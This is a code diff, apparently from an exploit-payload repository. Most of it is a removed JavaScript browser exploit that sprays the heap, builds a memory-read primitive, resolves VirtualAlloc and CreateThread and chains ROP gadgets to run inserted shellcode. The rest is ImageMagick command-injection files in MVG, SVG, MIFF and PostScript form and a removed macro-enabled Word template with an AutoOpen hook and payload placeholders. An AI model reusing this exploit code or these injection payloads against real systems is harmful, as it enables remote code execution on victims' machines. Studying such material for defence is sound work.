-<html><body bgcolor="#2F3236"><center><div><iframe width="1280" height="720" src="https://www.youtube.com/embed/wArxEk0Rxhc?autoplay=1" frameborder="0" allowfullscreen></iframe></div></center></body></html>
@@ -1,362 +0,0 @@
-var window = self;
-
-  function Memory(b,a,f) 
-  { 
-      this._base_addr=b; 
-      this._read=a; 
-      this._write=f; 
-      this._abs_read = function(a) { 
-          a >= this._base_addr ? a = this._read( a - this._base_addr) : ( a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) );
-          return 0>a?4294967295+a+1:a
-          
-      };
-      this._abs_write = function(a,b) {
-          a >= this._base_addr ? this._write(a - this._base_addr, b) : ( a = 4294967295 - this._base_addr + 1 + a, this._write(a,b) )
-      };
-      this.readByte = function(a) { 
-          return this.read(a) & 255
-          
-      };
-      this.readWord = function(a) {
-          return this.read(a) & 65535
-      };
-      this.readDword = function(a){ return this.read(a) };
-      this.read = function(a,b) { 
-          if (a%4) {
-              var c = this._abs_read( a & 4294967292),
-                  d = this._abs_read( a+4 & 4294967292),
-                  e = a%4;
-              return c>>>8*e | d<<8*(4-e)
-          }
-          return this._abs_read(a)
-      };
-      this.readStr = function(a) { 
-          for(var b = "", c = 0;;) {
-              if (32 == c)
-                  return "";
-              var d = this.readByte(a+c);
-              if(0 == d)
-                  break;
-              b += String.fromCharCode(d);
-              c++
-          }
-          return b
-          
-      };
-      this.write = function(a){}
-  }
-
-  function PE(b,a) { 
-      this.mem = b;
-      this.export_table = this.module_base = void 0;
-      this.export_table_size = 0;
-      this.import_table = void 0;
-      this.import_table_size = 0;
-      this.find_module_base = function(a) { 
-          for(a &= 4294901760; a; ) { 
-              if(0x5a4d == this.mem.readWord(a))
-                  return this.module_base=a;
-              a -= 65536
-          }
-      };
-      this._resolve_pe_structures = function() { 
-          peFile = this.module_base + this.mem.readWord(this.module_base+60);
-          if(0x4550 != this.mem.readDword(peFile))
-              throw "Bad NT Signature";
-
-          this.pe_file = peFile;
-          this.optional_header = this.pe_file+36;
-          this.export_directory = this.module_base+this.mem.readDword(this.pe_file+120);
-          this.export_directory_size = this.mem.readDword(this.pe_file+124);
-          this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);
-          this.import_directory_size=this.mem.readDword(this.pe_file+132)};
-          this.resolve_imported_function=function(a,b){
-              void 0==this.import_directory&&this._resolve_pe_structures();
-              for(var e=this.import_directory,c=e+this.import_directory_size;e<c;){
-                  var d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);
-                  if(a.toUpperCase()==d.toUpperCase()){
-                      for(var c = this.mem.readDword(e) + this.module_base,
-                              e = this.mem.readDword(e+16) + this.module_base, 
-                              d = this.mem.readDword(c), 
-                              f = 0 ; 0 !=d ; )
-                      {
-                          if(this.mem.readStr(d+this.module_base+2).toUpperCase() == b.toUpperCase())
-                              return this.mem.readDword(e+4*f);
-                          f++;
-                          d = this.mem.readDword(c+4*f)
-                      }
-                      break
-                  }
-                  e+=20
-              }
-              return 0
-          };
-          void 0!=a && this.find_module_base(a)
-      }
-
-    function ROP(mem,a){
-       this.mem = mem;
-       this.pe = new PE(mem,a);
-       this.pe._resolve_pe_structures();
-       this.module_base = this.pe.module_base + 0x1000;
-       
-       this.findSequence = function(seq) { 
-          for(var b=0;;) { 
-              for(var e=0,c=0;c<seq.length;c++)
-                  if(this.mem.readByte(this.module_base+b+c)==seq[c]&&e==c)
-                      e++;
-                  else 
-                      break;
-              if(e==seq.length)
-                  return this.module_base+b;
-              b++
-            
-       }
-        
-   };
-   this.findStackPivot=function() {
-       return this.findSequence([0x94, 0xc3])
-      
-   };
-   this.findPopRet=function(a) { 
-       return this.findSequence([0x58, 0xc3])
-      
-   };
-   this.ropChain=function(base, vtOffset, array = undefined) { 
-       var buf = undefined
-       if (array != undefined)
-        buf = array
-      else
-        buf = new ArrayBuffer(0x1000)
-       ropBuff = new Uint32Array(buf);
-       var stackPivot = this.findStackPivot(),
-           popRet = this.findPopRet("EAX"),
-           virtualAllocAddr = this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");
-
-       ropBuff[0]= popRet+1;
-       ropBuff[1]= popRet;
-       ropBuff[2]= base+vtOffset+4;
-       ropBuff[3]= stackPivot;
-       ropBuff[vtOffset>>2] = stackPivot;
-
-       offset = (vtOffset+4>>2);
-       ropBuff[offset++]=virtualAllocAddr;
-       ropBuff[offset++]=base+(vtOffset+0x1c);
-       ropBuff[offset++]=base;
-       ropBuff[offset++]=0x1000;
-       ropBuff[offset++]=0x1000;
-       ropBuff[offset++]=0x40;
-       ropBuff[offset++]=0xcccccccc;
-       
-       return ropBuff;
-   }
-}
-
-var conv=new ArrayBuffer(8)
-var convf64=new Float64Array(conv)
-var convu32=new Uint32Array(conv)
-
-var qword2Double=function(b,a) { 
-  convu32[0]=b;
-  convu32[1]=a;
-  return convf64[0]
-}
-
-var doubleFromFloat = function(b,a) { 
-  convf64[0]=b;
-  return convu32[a]
-}
-
-var sprayArrays=function() {
-  var mArray = new Array(0x1fffe)  
-  var arrBuf = new ArrayBuffer(0x100000);
-  var dwArray =  new Uint32Array(arrBuf)
-  var qwArray = new Float64Array(arrBuf, 0x10)
-
-
-  for (var i = 0; i < 0x1fffe; i++)
-    mArray[i] = qword2Double(0, 0);
-  
-   mArray[2]     = qword2Double(arrBase + 0xaf0, 0)
-   mArray[0xe]   = qword2Double(arrBase +  0x08, 0)
-   mArray[0x15]  = qword2Double(0, 0x02)
-   mArray[0x21]  = qword2Double(0x02, 0)
-   mArray[0x22]  = qword2Double(arrBase + 0x2f0, arrBase + 0x1f0)
-   mArray[0x3e]  = qword2Double(0, arrBase + 0x3f0)
-   mArray[0x5e]  = qword2Double(arrBase + 0x4f0, 0)
-   mArray[0x80]  = qword2Double(0x02, 0)
-   mArray[0x9f]  = qword2Double(arrBase + 0x500,0)
-   mArray[0xa0]  = qword2Double(0, 0xf0000000)
-   mArray[0xa2]  = qword2Double(0, 0xbff00000)
-   mArray[0xa4]  = qword2Double(0x02, 0)
-   mArray[0xa5]  = qword2Double(0x01, 0)
-   mArray[0xaa]  = qword2Double(0, arrBase + 0x5f0)
-   mArray[0xac]  = qword2Double(arrBase + 0x6f0, arrBase + 0x700)
-   mArray[0xb3]  = qword2Double(0, 0x02)
-   mArray[0xb4]  = qword2Double(0, 0)
-   mArray[0xde]  = qword2Double(arrBase + 0x7f0, 0)
-   mArray[0xfe]  = qword2Double(0x01, 0);
-   mArray[0xff]  = qword2Double(0, 0x10000000)
-   mArray[0x15e] = qword2Double(0x07, 0)
-   mArray[0x15f] = qword2Double(arrBase + 0xf0, arrBase - 0x10 + 0x05)
-   mArray[0x160] = qword2Double(arrBase - 0x07, arrBase - 0x10 + 0x0d)
-   mArray[0x161] = qword2Double(arrBase + 0x10000b, arrBase + 0x100007)
-   mArray[0x162] = qword2Double(arrBase + 0x100003, 0)
-   mArray[0x202] = qword2Double(arrBase + 0x1af0, 0)
-   mArray[0x20e] = qword2Double(arrBase + 0x1008, 0)
-   mArray[0x215] = qword2Double(0, 0x02)
-   mArray[0x221] = qword2Double(0x02, 0)
-   mArray[0x222] = qword2Double(arrBase + 0x12f0, arrBase + 0x11f0)
-   mArray[0x23e] = qword2Double(0, arrBase + 0x13f0)
-   mArray[0x25e] = qword2Double(arrBase + 0x14f0, 0)
-   mArray[0x280] = qword2Double(0x02, 0)
-   mArray[0x29f] = qword2Double(arrBase + 0x1500,0)
-   mArray[0x2a0] = qword2Double(0, 0xf0000000)
-   mArray[0x2a2] = qword2Double(0, 0xbff00000)
-   mArray[0x2a4] = qword2Double(0x02, 0)
-   mArray[0x2a5] = qword2Double(0x01, 0)
-   mArray[0x2aa] = qword2Double(0, arrBase + 0x15f0)
-   mArray[0x2ac] = qword2Double(arrBase + 0x16f0, arrBase + 0x1700)
-   mArray[0x2b3] = qword2Double(0, 0x02)
-   mArray[0x2b4] = qword2Double(0, 0x00)
-   mArray[0x2de] = qword2Double(arrBase + 0x17f0, 0)
-   mArray[0x2fe] = qword2Double(0x01, 0)
-   mArray[0x2ff] = qword2Double(0, 0x10000000)
-
-  var i = mArray.length;
-  while(i--) {qwArray[i] = mArray[i];}
-
-  for (var i = 0; i < spr.length; i += 2)
-  {
-    spr[i] = mArray.slice(0)
-    spr[i + 1] = arrBuf.slice(0)
-  }
-}
-
-var spr = new Array(400)
-var arrBase = 0x22100010;
-
-// insert codes here   \/ ------
-Shellcode = unescape("INSERTSHELLCODEHEREPLZ");
-
-if (Shellcode.length % 2 != 0)
-  Shellcode += "NOPSGOHERE";
-
-sprayArrays();
-postMessage(arrBase)
-
-
-var len = spr[0].length;
-var mArray = undefined;
-var dwArray = undefined;
-var qwArray = undefined;
-var container = undefined;
-
-while (mArray == undefined)
-{
-  for (var i = 0; i < spr.length; i += 2)
-  {
-    if (spr[i].length != len)
-    {
-      container = dwArray = new Uint32Array(spr[i + 1])
-      qwArray = new Float64Array(spr[i + 1], 0x10)
-      if (dwArray[1] == 0)
-      {
-        dwArray = new Uint32Array(spr[i - 1])
-        dwArray[0] = dwArray[1] = dwArray[2] = dwArray[3] = 0xdea110c8;
-        qwArray = new Float64Array(spr[i - 1], 0x10)
-      }
-      mArray = spr[i];
-      break;
-    }
-  }
-}
-
-var off = 0x100000;
-if (dwArray != container)
-  off = off * 2;
-
-var memory = new Uint32Array(0x10);
-var len = memory.length;
-mArray[0x20000] = memory;
-ropArrBuf = new ArrayBuffer(0x1000)
-mArray[0x20001] = ropArrBuf;
-ropArrBufPtr = container[0x6]
-
-targetAddr = container[4] + 0x1b;
-var arrayBase = container[4] + 0x30;
-
-mArray[0x20000] = undefined;
-mArray[0x20001] = undefined;
-
-var n = 0x40;
-qwArray[0x35e] = mArray[0x35e] = qword2Double(n + 1, 0)
-qwArray[0x35f] = mArray[0x35f] = qword2Double(arrBase - 0x10 + 0x1100, targetAddr)
-for (var i = 0; i < (n/2); i++)
-  qwArray[0x360 + i] = mArray[0x360 + i] = qword2Double(targetAddr, targetAddr)
-
-container[0] = container[1] = container[2] = container[3] = 0xffffff81;
-qwArray[0x1e] = mArray[0x1e] = qword2Double(0xdea110c8, 0)
-qwArray[0xfe] = mArray[0xfe] = qword2Double(2, 0)
-qwArray[0xb3] = mArray[0xb3] = qword2Double(0, 3)
-qwArray[0xa9] = mArray[0xa9] = qword2Double(0, 2)
-
-while (memory.length == len) {}
-
-
-var mem = new Memory(arrayBase, 
-                    function(b) { return memory[b/4]; }, 
-                    function(b,a) { memory[b/4] = a;  });
-
-var ptr = targetAddr - 0x1b;
-var xulPtr = mem.readDword(ptr + 0xc);
-var rop = new ROP(mem, xulPtr);
-var ropBase = mem.readDword(ropArrBufPtr + 0x10);
-rop.ropChain(ropBase, 0x130, ropArrBuf);
-var backupESP = rop.findSequence(Array(0x89, 0x01, 0xc3))
-var ropChain = new Uint32Array(ropArrBuf)
-ropChain[0] = backupESP;
-CreateThread = rop.pe.resolve_imported_function('KERNEL32.dll', 'CreateThread')
-
-ropChain[0x12c >> 2] = ropChain[0x130 >> 2];
-
-for (var i = 0; i < ropChain.length; i++)
-{
-  if (ropChain[i] == 0xcccccccc)
-    break;
-}
-
-ropChain[i++] = 0xc4819090;
-ropChain[i++] = 0x00000800;
-ropChain[i++] = 0x5050c031;
-ropChain[i++] = 0x5b21eb50;
-ropChain[i++] = 0xb8505053;
-ropChain[i++] = CreateThread;
-ropChain[i++] = 0xb890d0ff;
-ropChain[i++] = arrBase + 0x2040;
-ropChain[i++] = 0x5f58208b;
-ropChain[i++] = 0xbe905d58;
-ropChain[i++] = 0xFFFFFF00;
-ropChain[i++] = 0x000cc2c9;
-ropChain[i++] = 0xffffdae8;
-ropChain[i++] = 0x909090ff;
-
-for (var j = 0; j < Shellcode.length; j += 2)
-  ropChain[i++] = Shellcode.charCodeAt(j) + Shellcode.charCodeAt(j + 1) * 0x10000;
-
-mArray[0x400] = qwArray[0x400] = qword2Double(arrBase + 0x2000, 0)
-mArray[0x400 + (0x10 >> 3)] = qwArray[0x400 + (0x10 >> 3)] = qword2Double(0, arrBase + 0x2040)
-mArray[0x400 + (0x18 >> 3)] = qwArray[0x400 + (0x18 >> 3)] = qword2Double(4, 0)
-mArray[0x400 + (0x40 >> 3)] = qwArray[0x400 + (0x40 >> 3)] = qword2Double(ropBase, 0)
-mArray[0x400 + (0xac >> 3)] = qwArray[0x400 + (0xac >> 3)] = qword2Double(0, 2)
-
-for (var i = 0; i < 4; i++) {
-  container[0x400 + i] = 0xdea110c8
-}
-
-qwArray[0x21e] = mArray[0x21e] = qword2Double(0xdea110c8, 0)
-qwArray[0x2fe] = mArray[0x2fe] = qword2Double(2, 0)
-qwArray[0x2b3] = mArray[0x2b3] = qword2Double(0, 3)
-qwArray[0x2a9] = mArray[0x2a9] = qword2Double(0, 2)
-
-postMessage("!")
@@ -0,0 +1,14 @@
+id=ImageMagick  version=1.0
+class=DirectClass  colors=0  matte=False
+columns=1  rows=1  depth=16
+colorspace=sRGB
+page=1x1+0+0
+rendering-intent=Perceptual
+gamma=0.454545
+red-primary=0.64,0.33  green-primary=0.3,0.6  blue-primary=0.15,0.06
+white-point=0.3127,0.329
+date:create=2016-05-04T00:19:42-05:00
+date:modify=2016-05-04T00:19:42-05:00
+label={";echo vulnerable"}
+
+:ÿÿÿÿÿÿ
@@ -3,6 +3,6 @@ encoding "UTF-8"
 viewbox 0 0 1 1
 affine 1 0 0 1 0 0
 push graphic-context
-image Over 0,0 1,1 'https://localhost";echo vulnerable > /dev/tty"'
+image Over 0,0 1,1 'https://localhost";echo vulnerable"'
 pop graphic-context
 pop graphic-context
@@ -1,4 +0,0 @@
-%!PS
-currentdevice null true mark /OutputICCProfile (%pipe%echo vulnerable > /dev/tty)
-.putdeviceparams
-quit
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
-    xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x68;&#x6f;&#x73;&#x74;&#x22;&#x3b;echo vulnerable > /dev/tty&#x22;" />
+    xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x68;&#x6f;&#x73;&#x74;&#x22;&#x3b;echo vulnerable&#x22;" />
 </svg>
@@ -0,0 +1,14 @@
+id=ImageMagick  version=1.0
+class=DirectClass  colors=0  matte=False
+columns=1  rows=1  depth=16
+colorspace=sRGB
+page=1x1+0+0
+rendering-intent=Perceptual
+gamma=0.454545
+red-primary=0.64,0.33  green-primary=0.3,0.6  blue-primary=0.15,0.06
+white-point=0.3127,0.329
+date:create=2016-05-04T00:19:42-05:00
+date:modify=2016-05-04T00:19:42-05:00
+label={";touch vulnerable"}
+
+:ÿÿÿÿÿÿ
@@ -3,6 +3,6 @@ encoding "UTF-8"
 viewbox 0 0 1 1
 affine 1 0 0 1 0 0
 push graphic-context
-image Over 0,0 1,1 '|echo vulnerable > /dev/tty'
+image Over 0,0 1,1 '|touch vulnerable'
 pop graphic-context
 pop graphic-context
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
-    xlink:href="&#x7c;echo vulnerable > /dev/tty" />
+    xlink:href="&#x7c;touch vulnerable" />
 </svg>
@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>
@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>105</TotalTime><Pages>1</Pages><Words>1</Words><Characters>10</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="2" baseType="variant"><vt:variant><vt:lpstr>Title</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="1" baseType="lpstr"><vt:lpstr></vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>10</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>15.0000</AppVersion></Properties>
@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Windows User</dc:creator><cp:keywords></cp:keywords><dc:description>                                                       PAYLOADGOESHERE</dc:description><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>32</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2017-02-01T20:39:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-02T22:26:00Z</dcterms:modified></cp:coreProperties>
@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/></Relationships>
@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/wordVbaData" Target="vbaData.xml"/></Relationships>
@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><w:body><w:p w:rsidR="00A31ED0" w:rsidRDefault="00366A6C"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/><w:r><w:t>DOCBODYGOESHER</w:t></w:r></w:p><w:sectPr w:rsidR="00A31ED0"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Calibri Light"><w:panose1 w:val="020F0302020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>
@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="differentiateMultirowTableHeaders" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="0075759D"/><w:rsid w:val="000446F5"/><w:rsid w:val="00364989"/><w:rsid w:val="00366A6C"/><w:rsid w:val="003925D3"/><w:rsid w:val="00472204"/><w:rsid w:val="004929CB"/><w:rsid w:val="004937C6"/><w:rsid w:val="004E70C7"/><w:rsid w:val="00556042"/><w:rsid w:val="005C1470"/><w:rsid w:val="00634AFC"/><w:rsid w:val="0075759D"/><w:rsid w:val="008352C1"/><w:rsid w:val="008D18EE"/><w:rsid w:val="008F274A"/><w:rsid w:val="009337EB"/><w:rsid w:val="00965754"/><w:rsid w:val="00A31ED0"/><w:rsid w:val="00AA0D43"/><w:rsid w:val="00BD14BB"/><w:rsid w:val="00C22BA6"/><w:rsid w:val="00D4037B"/><w:rsid w:val="00DD6E1E"/><w:rsid w:val="00E636EA"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1026"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/><w15:chartTrackingRefBased/><w15:docId w15:val="{0E28A8EC-7E3E-41BD-9D1E-ADE8B995AEE4}"/></w:settings>
@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
@@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:optimizeForBrowser/><w:relyOnVML/><w:allowPNG/></w:webSettings>
@@ -1,6 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
